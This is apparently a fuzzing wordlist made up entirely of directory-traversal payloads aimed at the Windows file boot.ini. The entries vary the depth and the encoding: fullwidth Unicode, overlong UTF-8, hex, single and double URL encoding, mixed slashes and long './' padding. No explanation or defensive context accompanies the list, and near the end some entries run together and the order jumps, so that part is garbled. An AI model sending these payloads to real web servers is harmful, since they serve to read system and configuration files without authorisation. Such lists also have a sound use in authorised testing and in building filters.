-%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\boot.ini -%uff0e%uff0e%u2216boot.ini -%uff0e%uff0e%u2216%uff0e%uff0e%u2216boot.ini -%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216boot.ini -%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216boot.ini -%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216boot.ini -%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216boot.ini -%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216boot.ini -%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216boot.ini -..0x2fboot.ini -..0x2f..0x2fboot.ini -..0x2f..0x2f..0x2fboot.ini -..0x2f..0x2f..0x2f..0x2fboot.ini -..0x2f..0x2f..0x2f..0x2f..0x2fboot.ini -..0x2f..0x2f..0x2f..0x2f..0x2f..0x2fboot.ini -..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2fboot.ini -..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2fboot.ini -0x2e0x2e/boot.ini -0x2e0x2e/0x2e0x2e/boot.ini -0x2e0x2e/0x2e0x2e/0x2e0x2e/boot.ini -0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/boot.ini -0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/boot.ini -0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/boot.ini -0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/boot.ini -0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/boot.ini -0x2e0x2e0x2fboot.ini -0x2e0x2e0x2f0x2e0x2e0x2fboot.ini -0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2fboot.ini -0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2fboot.ini -0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2fboot.ini -0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2fboot.ini -0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2fboot.ini -0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2fboot.ini -..0x5cboot.ini -..0x5c..0x5cboot.ini -..0x5c..0x5c..0x5cboot.ini -..0x5c..0x5c..0x5c..0x5cboot.ini -..0x5c..0x5c..0x5c..0x5c..0x5cboot.ini -..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cboot.ini -..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cboot.ini -..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cboot.ini -0x2e0x2e\boot.ini -0x2e0x2e\0x2e0x2e\boot.ini -0x2e0x2e\0x2e0x2e\0x2e0x2e\boot.ini -0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\boot.ini -0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\boot.ini -0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\boot.ini -0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\boot.ini -0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\boot.ini -0x2e0x2e0x5cboot.ini -0x2e0x2e0x5c0x2e0x2e0x5cboot.ini -0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5cboot.ini -0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5cboot.ini -0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5cboot.ini -0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5cboot.ini -0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5cboot.ini -0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5cboot.ini -..%c0%2fboot.ini -..%c0%2f..%c0%2fboot.ini -..%c0%2f..%c0%2f..%c0%2fboot.ini -..%c0%2f..%c0%2f..%c0%2f..%c0%2fboot.ini -..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2fboot.ini -..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2fboot.ini -..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2fboot.ini -..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2fboot.ini -%c0%2e%c0%2e/boot.ini -%c0%2e%c0%2e/%c0%2e%c0%2e/boot.ini -%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/boot.ini -%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/boot.ini -%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/boot.ini -%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/boot.ini -%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/boot.ini -%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/boot.ini -%c0%2e%c0%2e%c0%2fboot.ini -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fboot.ini -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fboot.ini -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fboot.ini -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fboot.ini -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fboot.ini -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fboot.ini -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fboot.ini -..%c0%5cboot.ini -..%c0%5c..%c0%5cboot.ini -..%c0%5c..%c0%5c..%c0%5cboot.ini -..%c0%5c..%c0%5c..%c0%5c..%c0%5cboot.ini -..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5cboot.ini -..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5cboot.ini -..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5cboot.ini -..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5cboot.ini -%c0%2e%c0%2e\boot.ini -%c0%2e%c0%2e\%c0%2e%c0%2e\boot.ini -%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\boot.ini -%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\boot.ini -%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\boot.ini -%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\boot.ini -%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\boot.ini -%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\boot.ini -%c0%2e%c0%2e%c0%5cboot.ini -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cboot.ini -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cboot.ini -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cboot.ini -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cboot.ini -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cboot.ini -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cboot.ini -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cboot.ini -///%2e%2e%2fboot.ini -///%2e%2e%2f%2e%2e%2fboot.ini -///%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -\\\%2e%2e%5cboot.ini -\\\%2e%2e%5c%2e%2e%5cboot.ini -\\\%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -..//boot.ini -..//..//boot.ini -..//..//..//boot.ini -..//..//..//..//boot.ini -..//..//..//..//..//boot.ini -..//..//..//..//..//..//boot.ini -..//..//..//..//..//..//..//boot.ini -..//..//..//..//..//..//..//..//boot.ini -..///boot.ini -..///..///boot.ini -..///..///..///boot.ini -..///..///..///..///boot.ini -..///..///..///..///..///boot.ini -..///..///..///..///..///..///boot.ini -..///..///..///..///..///..///..///boot.ini -..///..///..///..///..///..///..///..///boot.ini -..\\boot.ini -..\\..\\boot.ini -..\\..\\..\\boot.ini -..\\..\\..\\..\\boot.ini -..\\..\\..\\..\\..\\boot.ini -..\\..\\..\\..\\..\\..\\boot.ini -..\\..\\..\\..\\..\\..\\..\\boot.ini -..\\..\\..\\..\\..\\..\\..\\..\\boot.ini -..\\\boot.ini -..\\\..\\\boot.ini -..\\\..\\\..\\\boot.ini -..\\\..\\\..\\\..\\\boot.ini -..\\\..\\\..\\\..\\\..\\\boot.ini -..\\\..\\\..\\\..\\\..\\\..\\\boot.ini -..\\\..\\\..\\\..\\\..\\\..\\\..\\\boot.ini -..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\boot.ini -./\/./boot.ini -./\/././\/./boot.ini -./\/././\/././\/./boot.ini -./\/././\/././\/././\/./boot.ini -./\/././\/././\/././\/././\/./boot.ini -./\/././\/././\/././\/././\/././\/./boot.ini -./\/././\/././\/././\/././\/././\/././\/./boot.ini -./\/././\/././\/././\/././\/././\/././\/././\/./boot.ini -.\/\.\boot.ini -.\/\.\.\/\.\boot.ini -.\/\.\.\/\.\.\/\.\boot.ini -.\/\.\.\/\.\.\/\.\.\/\.\boot.ini -.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\boot.ini -.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\boot.ini -.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\boot.ini -.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\boot.ini -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../boot.ini -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../boot.ini -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../boot.ini -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../boot.ini -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../boot.ini -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../boot.ini -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../boot.ini -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../boot.ini -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\boot.ini -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\boot.ini -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\boot.ini -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\boot.ini -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\boot.ini -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\boot.ini -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\boot.ini -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\boot.ini -./../boot.ini -./.././../boot.ini -./.././.././../boot.ini -./.././.././.././../boot.ini -./.././.././.././.././../boot.ini -./.././.././.././.././.././../boot.ini -./.././.././.././.././.././.././../boot.ini -./.././.././.././.././.././.././.././../boot.ini -.\..\boot.ini -.\..\.\..\boot.ini -.\..\.\..\.\..\boot.ini -.\..\.\..\.\..\.\..\boot.ini -.\..\.\..\.\..\.\..\.\..\boot.ini -.\..\.\..\.\..\.\..\.\..\.\..\boot.ini -.\..\.\..\.\..\.\..\.\..\.\..\.\..\boot.ini -.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\boot.ini -.//..//boot.ini -.//..//.//..//boot.ini -.//..//.//..//.//..//boot.ini -.//..//.//..//.//..//.//..//boot.ini -.//..//.//..//.//..//.//..//.//..//boot.ini -.//..//.//..//.//..//.//..//.//..//.//..//boot.ini -.//..//.//..//.//..//.//..//.//..//.//..//.//..//boot.ini -.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//boot.ini -.\\..\\boot.ini -.\\..\\.\\..\\boot.ini -.\\..\\.\\..\\.\\..\\boot.ini -.\\..\\.\\..\\.\\..\\.\\..\\boot.ini -.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\boot.ini -.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\boot.ini -.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\boot.ini -.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\boot.ini -../boot.ini -../../boot.ini -../../../boot.ini -../../../../boot.ini -../../../../../boot.ini -../../../../../../boot.ini -../../../../../../../boot.ini -../../../../../../../../boot.ini -..%2fboot.ini -..%2f..%2fboot.ini -..%2f..%2f..%2fboot.ini -..%2f..%2f..%2f..%2fboot.ini -..%2f..%2f..%2f..%2f..%2fboot.ini -..%2f..%2f..%2f..%2f..%2f..%2fboot.ini -..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini -..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini -%2e%2e/boot.ini -%2e%2e/%2e%2e/boot.ini -%2e%2e/%2e%2e/%2e%2e/boot.ini -%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini -%2e%2e%2fboot.ini -%2e%2e%2f%2e%2e%2fboot.ini -%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -..%252fboot.ini -..%252f..%252fboot.ini -..%252f..%252f..%252fboot.ini -..%252f..%252f..%252f..%252fboot.ini -..%252f..%252f..%252f..%252f..%252fboot.ini -..%252f..%252f..%252f..%252f..%252f..%252fboot.ini -..%252f..%252f..%252f..%252f..%252f..%252f..%252fboot.ini -..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fboot.ini -%252e%252e/boot.ini -%252e%252e/%252e%252e/boot.ini -%252e%252e/%252e%252e/%252e%252e/boot.ini -%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini -%252e%252e%252fboot.ini -%252e%252e%252f%252e%252e%252fboot.ini -%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -..\boot.ini -..\..\boot.ini -..\..\..\boot.ini -..\..\..\..\boot.ini -..\..\..\..\..\boot.ini -..\..\..\..\..\..\boot.ini -..\..\..\..\..\..\..\boot.ini -..\..\..\..\..\..\..\..\boot.ini -..%255cboot.ini -..%255c..%255cboot.ini -..%255c..%255c..%255cboot.ini -..%255c..%255c..%255c..%255cboot.ini -..%255c..%255c..%255c..%255c..%255cboot.ini -..%255c..%255c..%255c..%255c..%255c..%255cboot.ini -..%255c..%255c..%255c..%255c..%255c..%255c..%255cboot.ini -..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cboot.ini -%252e%252e\boot.ini -%252e%252e\%252e%252e\boot.ini..%5cboot.ini -..%5c..%5cboot.ini -..%5c..%5c..%5cboot.ini -..%5c..%5c..%5c..%5cboot.ini -..%5c..%5c..%5c..%5c..%5cboot.ini -..%5c..%5c..%5c..%5c..%5c..%5cboot.ini -..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini -..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini -%2e%2e\boot.ini -%2e%2e\%2e%2e\boot.ini -%2e%2e\%2e%2e\%2e%2e\boot.ini -%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini -%2e%2e%5cboot.ini -%2e%2e%5c%2e%2e%5cboot.ini -%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -%252e%252e\%252e%252e\%252e%252e\boot.ini -%252e%252e\%252e%252e\%252e%252e\%252e%252e\boot.ini -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\boot.ini -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\boot.ini -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\boot.ini -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\boot.ini -%252e%252e%255cboot.ini -%252e%252e%255c%252e%252e%255cboot.ini -%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini 